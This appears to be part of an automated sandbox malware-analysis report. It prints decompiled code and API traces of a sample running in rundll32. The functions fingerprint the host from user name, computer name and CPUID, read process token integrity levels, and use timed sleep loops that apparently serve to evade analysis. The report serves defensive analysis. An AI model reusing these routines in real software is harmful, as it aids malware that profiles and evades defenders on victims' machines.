                                                  • Instruction Fuzzy Hash: A38147B1D20109AFDF118FA5EC89AEEBBB9FF44351F10416AE505E6290DB349A50CF70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E052D83B7(char _a4, void* _a8) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				char _v16;
                                                  				void* _v20;
                                                  				char _v24;
                                                  				char _v28;
                                                  				char _v32;
                                                  				char _v36;
                                                  				char _v40;
                                                  				void* _v44;
                                                  				void** _t33;
                                                  				void* _t40;
                                                  				void* _t43;
                                                  				void** _t44;
                                                  				intOrPtr* _t47;
                                                  				char _t48;
                                                  
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v20 = _a4;
                                                  				_t48 = 0;
                                                  				_v16 = 0;
                                                  				_a4 = 0;
                                                  				_v44 = 0x18;
                                                  				_v40 = 0;
                                                  				_v32 = 0;
                                                  				_v36 = 0;
                                                  				_v28 = 0;
                                                  				_v24 = 0;
                                                  				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                  					_t33 =  &_v8;
                                                  					__imp__(_v12, 8, _t33);
                                                  					if(_t33 >= 0) {
                                                  						_t47 = __imp__;
                                                  						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                  						_t44 = E052D2049(_a4);
                                                  						if(_t44 != 0) {
                                                  							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                  							if(_t40 >= 0) {
                                                  								memcpy(_a8,  *_t44, 0x1c);
                                                  								_t48 = 1;
                                                  							}
                                                  							E052D9039(_t44);
                                                  						}
                                                  						NtClose(_v8); // executed
                                                  					}
                                                  					NtClose(_v12);
                                                  				}
                                                  				return _t48;
                                                  			}

                                                  APIs
                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 052D83FE
                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 052D8411
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 052D842D
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 052D844A
                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 052D8457
                                                  • NtClose.NTDLL(?), ref: 052D8469
                                                  • NtClose.NTDLL(00000000), ref: 052D8473
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                  • String ID:
                                                  • API String ID: 2575439697-0
                                                  • Opcode ID: 38e5c6b3818b62279345d695aa1c01557d3057b76a02fce108351f0515039258
                                                  • Instruction ID: 77688509ee74d660c92daefa45f2bccdea56b9e27f42ccde271768dc65667600
                                                  • Opcode Fuzzy Hash: 38e5c6b3818b62279345d695aa1c01557d3057b76a02fce108351f0515039258
                                                  • Instruction Fuzzy Hash: 8921E6B2A10228FBDF119F95DC49AEEBFBDEF08760F104026F905B6150D7719A44DBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 83%
                                                  			E052D6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				struct %anon52 _v8;
                                                  				long _v12;
                                                  				char _v16;
                                                  				char _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v32;
                                                  				union _LARGE_INTEGER _v36;
                                                  				intOrPtr _v40;
                                                  				void* _v44;
                                                  				void _v88;
                                                  				char _v92;
                                                  				struct %anon52 _t46;
                                                  				intOrPtr _t51;
                                                  				long _t53;
                                                  				void* _t54;
                                                  				struct %anon52 _t60;
                                                  				long _t64;
                                                  				signed int _t65;
                                                  				void* _t68;
                                                  				void* _t70;
                                                  				signed int _t71;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t76;
                                                  				void** _t78;
                                                  				void* _t80;
                                                  
                                                  				_t73 = __edx;
                                                  				_v92 = 0;
                                                  				memset( &_v88, 0, 0x2c);
                                                  				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                  				_v44 = _t46;
                                                  				if(_t46 == 0) {
                                                  					_v8.LowPart = GetLastError();
                                                  				} else {
                                                  					_push(0xffffffff);
                                                  					_push(0xff676980);
                                                  					_push(0);
                                                  					_push( *0x52dd240);
                                                  					_v20 = 0;
                                                  					_v16 = 0;
                                                  					L052DB0C8();
                                                  					_v36.LowPart = _t46;
                                                  					_v32 = _t73;
                                                  					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                  					_t51 =  *0x52dd26c; // 0x31c
                                                  					_v40 = _t51;
                                                  					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                  					_v8.LowPart = _t53;
                                                  					if(_t53 == 0) {
                                                  						if(_a8 != 0) {
                                                  							L4:
                                                  							 *0x52dd24c = 5;
                                                  						} else {
                                                  							_t68 = E052D73FD(_t73); // executed
                                                  							if(_t68 != 0) {
                                                  								goto L4;
                                                  							}
                                                  						}
                                                  						_v12 = 0;
                                                  						L6:
                                                  						L6:
                                                  						if(_v12 == 1 && ( *0x52dd260 & 0x00000001) == 0) {
                                                  							_v12 = 2;
                                                  						}
                                                  						_t71 = _v12;
                                                  						_t58 = _t71 << 4;
                                                  						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                  						_t72 = _t71 + 1;
                                                  						_v24 = _t71 + 1;
                                                  						_t60 = E052D8504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                  						_v8.LowPart = _t60;
                                                  						if(_t60 != 0) {
                                                  							goto L17;
                                                  						}
                                                  						_t65 = _v24;
                                                  						_t90 = _t65 - 3;
                                                  						_v12 = _t65;
                                                  						if(_t65 != 3) {
                                                  							goto L6;
                                                  						} else {
                                                  							_v8.LowPart = E052D3BF1(_t72, _t90,  &_v92, _a4, _a8);
                                                  						}
                                                  						goto L12;
                                                  						L17:
                                                  						__eflags = _t60 - 0x10d2;
                                                  						if(_t60 != 0x10d2) {
                                                  							_push(0xffffffff);
                                                  							_push(0xff676980);
                                                  							_push(0);
                                                  							_push( *0x52dd244);
                                                  							goto L21;
                                                  						} else {
                                                  							__eflags =  *0x52dd248; // 0x0
                                                  							if(__eflags == 0) {
                                                  								goto L12;
                                                  							} else {
                                                  								_t60 = E052DA1B0();
                                                  								_push(0xffffffff);
                                                  								_push(0xdc3cba00);
                                                  								_push(0);
                                                  								_push( *0x52dd248);
                                                  								L21:
                                                  								L052DB0C8();
                                                  								_v36.LowPart = _t60;
                                                  								_v32 = _t76;
                                                  								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                  								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                  								__eflags = _t64;
                                                  								_v8.LowPart = _t64;
                                                  								if(_t64 == 0) {
                                                  									goto L6;
                                                  								} else {
                                                  									goto L12;
                                                  								}
                                                  							}
                                                  						}
                                                  						L25:
                                                  					}
                                                  					L12:
                                                  					_t78 =  &_v92;
                                                  					_t70 = 3;
                                                  					do {
                                                  						_t54 =  *_t78;
                                                  						if(_t54 != 0) {
                                                  							HeapFree( *0x52dd238, 0, _t54);
                                                  						}
                                                  						_t78 =  &(_t78[4]);
                                                  						_t70 = _t70 - 1;
                                                  					} while (_t70 != 0);
                                                  					CloseHandle(_v44);
                                                  				}
                                                  				return _v8;
                                                  				goto L25;
                                                  			}

                                                  0x052d6786
                                                  0x052d6798
                                                  0x052d679b
                                                  0x052d67a7
                                                  0x052d67af
                                                  0x052d67b2
                                                  0x052d6919
                                                  0x052d67b8
                                                  0x052d67b8
                                                  0x052d67ba
                                                  0x052d67bf
                                                  0x052d67c0
                                                  0x052d67c6
                                                  0x052d67c9
                                                  0x052d67cc
                                                  0x052d67da
                                                  0x052d67e5
                                                  0x052d67e8
                                                  0x052d67ea
                                                  0x052d67f7
                                                  0x052d6801
                                                  0x052d6805
                                                  0x052d6808
                                                  0x052d680d
                                                  0x052d6818
                                                  0x052d6818
                                                  0x052d680f
                                                  0x052d680f
                                                  0x052d6816
                                                  0x00000000
                                                  0x00000000
                                                  0x052d6816
                                                  0x052d6822
                                                  0x00000000
                                                  0x052d6825
                                                  0x052d6829
                                                  0x052d6834
                                                  0x052d6834
                                                  0x052d683b
                                                  0x052d6844
                                                  0x052d684b
                                                  0x052d6854
                                                  0x052d6857
                                                  0x052d685a
                                                  0x052d6861
                                                  0x052d6864
                                                  0x00000000
                                                  0x00000000
                                                  0x052d6866
                                                  0x052d6869
                                                  0x052d686c
                                                  0x052d686f
                                                  0x00000000
                                                  0x052d6871
                                                  0x052d6880
                                                  0x052d6880
                                                  0x00000000
                                                  0x052d68ae
                                                  0x052d68ae
                                                  0x052d68b3
                                                  0x052d68d2
                                                  0x052d68d4
                                                  0x052d68d9
                                                  0x052d68da
                                                  0x00000000
                                                  0x052d68b5
                                                  0x052d68b5
                                                  0x052d68bb
                                                  0x00000000
                                                  0x052d68bd
                                                  0x052d68bd
                                                  0x052d68c2
                                                  0x052d68c4
                                                  0x052d68c9
                                                  0x052d68ca
                                                  0x052d68e0
                                                  0x052d68e0
                                                  0x052d68e8
                                                  0x052d68f3
                                                  0x052d68f6
                                                  0x052d6901
                                                  0x052d6903
                                                  0x052d6905
                                                  0x052d6908
                                                  0x00000000
                                                  0x052d690e
                                                  0x00000000
                                                  0x052d690e
                                                  0x052d6908
                                                  0x052d68bb
                                                  0x00000000
                                                  0x052d68b3
                                                  0x052d6883
                                                  0x052d6885
                                                  0x052d6888
                                                  0x052d6889
                                                  0x052d6889
                                                  0x052d688d
                                                  0x052d6897
                                                  0x052d6897
                                                  0x052d689d
                                                  0x052d68a0
                                                  0x052d68a0
                                                  0x052d68a6
                                                  0x052d68a6
                                                  0x052d6923
                                                  0x00000000

                                                  APIs
                                                  • memset.NTDLL ref: 052D679B
                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 052D67A7
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 052D67CC
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 052D67E8
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 052D6801
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 052D6897
                                                  • CloseHandle.KERNEL32(?), ref: 052D68A6
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 052D68E0
                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,052D2417,?), ref: 052D68F6
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 052D6901
                                                    • Part of subcall function 052D73FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,073093C0,?,00000000,30314549,00000014,004F0053,0730937C), ref: 052D74E9
                                                    • Part of subcall function 052D73FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,052D6814), ref: 052D74FB
                                                  • GetLastError.KERNEL32 ref: 052D6913
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                  • String ID:
                                                  • API String ID: 3521023985-0
                                                  • Opcode ID: e4dd63895c17cdf7ab0aa93d8f3e54d5b2b368f9c2a78af0706fa5cc0a7160f2
                                                  • Instruction ID: 71d05b833fb206636e9e9bed5f2cd3fdb98d4743828eda5cff7384c6b10eba86
                                                  • Opcode Fuzzy Hash: e4dd63895c17cdf7ab0aa93d8f3e54d5b2b368f9c2a78af0706fa5cc0a7160f2
                                                  • Instruction Fuzzy Hash: 56511971925229AADF10DF94EC49DEEFFB9EF49324F204116F815E2190D774AA44CBB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E052D1B2F(intOrPtr __edx, void** _a4, void** _a8) {
                                                  				intOrPtr _v8;
                                                  				struct _FILETIME* _v12;
                                                  				short _v56;
                                                  				struct _FILETIME* _t12;
                                                  				intOrPtr _t13;
                                                  				void* _t17;
                                                  				void* _t21;
                                                  				intOrPtr _t27;
                                                  				long _t28;
                                                  				void* _t30;
                                                  
                                                  				_t27 = __edx;
                                                  				_t12 =  &_v12;
                                                  				GetSystemTimeAsFileTime(_t12);
                                                  				_push(0x192);
                                                  				_push(0x54d38000);
                                                  				_push(_v8);
                                                  				_push(_v12);
                                                  				L052DB0C2();
                                                  				_push(_t12);
                                                  				_v12 = _t12;
                                                  				_t13 =  *0x52dd27c; // 0x202a5a8
                                                  				_t5 = _t13 + 0x52de862; // 0x7308e0a
                                                  				_t6 = _t13 + 0x52de59c; // 0x530025
                                                  				_push(0x16);
                                                  				_push( &_v56);
                                                  				_v8 = _t27;
                                                  				L052DAD5A();
                                                  				_t17 = CreateFileMappingW(0xffffffff, 0x52dd2a8, 4, 0, 0x1000,  &_v56); // executed
                                                  				_t30 = _t17;
                                                  				if(_t30 == 0) {
                                                  					_t28 = GetLastError();
                                                  				} else {
                                                  					if(GetLastError() == 0xb7) {
                                                  						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                  						if(_t21 == 0) {
                                                  							_t28 = GetLastError();
                                                  							if(_t28 != 0) {
                                                  								goto L6;
                                                  							}
                                                  						} else {
                                                  							 *_a4 = _t30;
                                                  							 *_a8 = _t21;
                                                  							_t28 = 0;
                                                  						}
                                                  					} else {
                                                  						_t28 = 2;
                                                  						L6:
                                                  						CloseHandle(_t30);
                                                  					}
                                                  				}
                                                  				return _t28;
                                                  			}

                                                  0x052d1b2f
                                                  0x052d1b37
                                                  0x052d1b3b
                                                  0x052d1b41
                                                  0x052d1b46
                                                  0x052d1b4b
                                                  0x052d1b4e
                                                  0x052d1b51
                                                  0x052d1b56
                                                  0x052d1b57
                                                  0x052d1b5a
                                                  0x052d1b5f
                                                  0x052d1b66
                                                  0x052d1b70
                                                  0x052d1b72
                                                  0x052d1b73
                                                  0x052d1b76
                                                  0x052d1b92
                                                  0x052d1b98
                                                  0x052d1b9c
                                                  0x052d1bea
                                                  0x052d1b9e
                                                  0x052d1bab
                                                  0x052d1bbb
                                                  0x052d1bc3
                                                  0x052d1bd5
                                                  0x052d1bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x052d1bc5
                                                  0x052d1bc8
                                                  0x052d1bcd
                                                  0x052d1bcf
                                                  0x052d1bcf
                                                  0x052d1bad
                                                  0x052d1baf
                                                  0x052d1bdb
                                                  0x052d1bdc
                                                  0x052d1bdc
                                                  0x052d1bab
                                                  0x052d1bf1

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,052D22EA,?,?,4D283A53,?,?), ref: 052D1B3B
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 052D1B51
                                                  • _snwprintf.NTDLL ref: 052D1B76
                                                  • CreateFileMappingW.KERNELBASE(000000FF,052DD2A8,00000004,00000000,00001000,?), ref: 052D1B92
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,052D22EA,?,?,4D283A53), ref: 052D1BA4
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 052D1BBB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,052D22EA,?,?), ref: 052D1BDC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,052D22EA,?,?,4D283A53), ref: 052D1BE4
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1814172918-0
                                                  • Opcode ID: bc1c63c7554e232fd639938fe91ea62434da9db7e8dbd0c9d7af348445c858c8
                                                  • Instruction ID: de321db07c60219415ff9790086b821972ec583774e2e99e48f89853f375347f
                                                  • Opcode Fuzzy Hash: bc1c63c7554e232fd639938fe91ea62434da9db7e8dbd0c9d7af348445c858c8
                                                  • Instruction Fuzzy Hash: 9A210876A15204BBD711DBA4DC09F99BBB9AF84751F154111F505E71C0EB709900CB70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 96%
                                                  			E052D269C(char __eax, signed int* __esi) {
                                                  				long _v8;
                                                  				char _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v28;
                                                  				long _t34;
                                                  				signed int _t39;
                                                  				long _t50;
                                                  				char _t59;
                                                  				intOrPtr _t61;
                                                  				void* _t62;
                                                  				void* _t63;
                                                  				signed int* _t64;
                                                  				char _t65;
                                                  				intOrPtr* _t67;
                                                  				void* _t68;
                                                  				signed int* _t69;
                                                  
                                                  				_t69 = __esi;
                                                  				_t65 = __eax;
                                                  				_v8 = 0;
                                                  				_v12 = __eax;
                                                  				if(__eax == 0) {
                                                  					_t59 =  *0x52dd270; // 0xd448b889
                                                  					_v12 = _t59;
                                                  				}
                                                  				_t64 = _t69;
                                                  				E052D6B43( &_v12, _t64);
                                                  				if(_t65 != 0) {
                                                  					 *_t69 =  *_t69 ^  *0x52dd278 ^ 0x4c0ca0ae;
                                                  				} else {
                                                  					GetUserNameW(0,  &_v8); // executed
                                                  					_t50 = _v8;
                                                  					if(_t50 != 0) {
                                                  						_t62 = RtlAllocateHeap( *0x52dd238, 0, _t50 + _t50);
                                                  						if(_t62 != 0) {
                                                  							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                  								_t63 = _t62;
                                                  								 *_t69 =  *_t69 ^ E052D2496(_v8 + _v8, _t63);
                                                  							}
                                                  							HeapFree( *0x52dd238, 0, _t62);
                                                  						}
                                                  					}
                                                  				}
                                                  				_t61 = __imp__;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				GetComputerNameW(0,  &_v8);
                                                  				_t34 = _v8;
                                                  				if(_t34 != 0) {
                                                  					_t68 = RtlAllocateHeap( *0x52dd238, 0, _t34 + _t34);
                                                  					if(_t68 != 0) {
                                                  						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                  							_t63 = _t68;
                                                  							_t69[3] = _t69[3] ^ E052D2496(_v8 + _v8, _t63);
                                                  						}
                                                  						HeapFree( *0x52dd238, 0, _t68);
                                                  					}
                                                  				}
                                                  				asm("cpuid");
                                                  				_t67 =  &_v28;
                                                  				 *_t67 = 1;
                                                  				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                  				 *(_t67 + 8) = _t63;
                                                  				 *(_t67 + 0xc) = _t64;
                                                  				_t39 = _v16 ^ _v20 ^ _v28;
                                                  				_t69[1] = _t69[1] ^ _t39;
                                                  				return _t39;
                                                  			}

                                                  0x052d269c
                                                  0x052d26a4
                                                  0x052d26aa
                                                  0x052d26ad
                                                  0x052d26b0
                                                  0x052d26b2
                                                  0x052d26b7
                                                  0x052d26b7
                                                  0x052d26bd
                                                  0x052d26bf
                                                  0x052d26cc
                                                  0x052d272d
                                                  0x052d26ce
                                                  0x052d26d3
                                                  0x052d26d9
                                                  0x052d26de
                                                  0x052d26ec
                                                  0x052d26f0
                                                  0x052d26ff
                                                  0x052d2706
                                                  0x052d270d
                                                  0x052d270d
                                                  0x052d2718
                                                  0x052d2718
                                                  0x052d26f0
                                                  0x052d26de
                                                  0x052d272f
                                                  0x052d2735
                                                  0x052d273f
                                                  0x052d2741
                                                  0x052d2746
                                                  0x052d2755
                                                  0x052d2759
                                                  0x052d2764
                                                  0x052d276b
                                                  0x052d2772
                                                  0x052d2772
                                                  0x052d277e
                                                  0x052d277e
                                                  0x052d2759
                                                  0x052d2787
                                                  0x052d2789
                                                  0x052d278c
                                                  0x052d278e
                                                  0x052d2791
                                                  0x052d2794
                                                  0x052d279e
                                                  0x052d27a2
                                                  0x052d27a6

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 052D26D3
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 052D26EA
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 052D26F7
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,052D23D9), ref: 052D2718
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 052D273F
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 052D2753
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 052D2760
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,052D23D9), ref: 052D277E
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                  • String ID:
                                                  • API String ID: 3239747167-0
                                                  • Opcode ID: 8c6555c2b6b81ed4598b5794591fdfc925776d65f1c8e2baf76a52e4145577e2
                                                  • Instruction ID: d41c0bc292e71ac09ad1eea47a8810057067d1082cdec426ae00e289e3993b94
                                                  • Opcode Fuzzy Hash: 8c6555c2b6b81ed4598b5794591fdfc925776d65f1c8e2baf76a52e4145577e2
                                                  • Instruction Fuzzy Hash: 8F311C75A20606EFDB11DFA9D889A6EFBF9FF48320F244029E445E7250DB30ED459B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E052D924F(long* _a4) {
                                                  				long _v8;
                                                  				void* _v12;
                                                  				void _v16;
                                                  				long _v20;
                                                  				int _t33;
                                                  				void* _t46;
                                                  
                                                  				_v16 = 1;
                                                  				_v20 = 0x2000;
                                                  				if( *0x52dd25c > 5) {
                                                  					_v16 = 0;
                                                  					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                  						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                  						_v8 = 0;
                                                  						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                  						if(_v8 != 0) {
                                                  							_t46 = E052D2049(_v8);
                                                  							if(_t46 != 0) {
                                                  								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                  								if(_t33 != 0) {
                                                  									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                  								}
                                                  								E052D9039(_t46);
                                                  							}
                                                  						}
                                                  						CloseHandle(_v12);
                                                  					}
                                                  				}
                                                  				 *_a4 = _v20;
                                                  				return _v16;
                                                  			}

                                                  APIs
                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 052D9281
                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 052D92A1
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 052D92B1
                                                  • CloseHandle.KERNEL32(00000000), ref: 052D9301
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 052D92D4
                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 052D92DC
                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 052D92EC
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                  • String ID:
                                                  • API String ID: 1295030180-0
                                                  • Opcode ID: d448af2f88922ad8b3f778ae063546d00548880afe6fe5fbc73fa14b718fa5fe
                                                  • Instruction ID: 3c074bb86899983da4d819401353814e58f243d247f3d63070e2e5c43aa53545
                                                  • Opcode Fuzzy Hash: d448af2f88922ad8b3f778ae063546d00548880afe6fe5fbc73fa14b718fa5fe
                                                  • Instruction Fuzzy Hash: C0214A75D14209FFEB009F91DC88EAEBF79EF44315F100065F911A2190DB718A45EB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E052D6A56(void* __ecx, void* __edx, intOrPtr _a4) {
                                                  				struct _FILETIME _v12;
                                                  				void* _t10;
                                                  				void* _t12;
                                                  				int _t14;
                                                  				signed int _t16;
                                                  				void* _t18;
                                                  				signed int _t19;
                                                  				unsigned int _t23;
                                                  				void* _t26;
                                                  				signed int _t33;
                                                  
                                                  				_t26 = __edx;
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                  				 *0x52dd238 = _t10;
                                                  				if(_t10 != 0) {
                                                  					 *0x52dd1a8 = GetTickCount();
                                                  					_t12 = E052D8F10(_a4);
                                                  					if(_t12 == 0) {
                                                  						do {
                                                  							GetSystemTimeAsFileTime( &_v12);
                                                  							_t14 = SwitchToThread();
                                                  							_t23 = _v12.dwHighDateTime;
                                                  							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                  							_push(0);
                                                  							_push(9);
                                                  							_push(_t23 >> 7);
                                                  							_push(_t16);
                                                  							L052DB226();
                                                  							_t33 = _t14 + _t16;
                                                  							_t18 = E052D7E03(_a4, _t33);
                                                  							_t19 = 2;
                                                  							_t25 = _t33;
                                                  							Sleep(_t19 << _t33); // executed
                                                  						} while (_t18 == 1);
                                                  						if(E052D6B96(_t25) != 0) {
                                                  							 *0x52dd260 = 1; // executed
                                                  						}
                                                  						_t12 = E052D225B(_t26); // executed
                                                  					}
                                                  				} else {
                                                  					_t12 = 8;
                                                  				}
                                                  				return _t12;
                                                  			}

                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,052D807D,?), ref: 052D6A69
                                                  • GetTickCount.KERNEL32 ref: 052D6A7D
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,052D807D,?), ref: 052D6A99
                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,052D807D,?), ref: 052D6A9F
                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 052D6ABC
                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,052D807D,?), ref: 052D6AD6
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
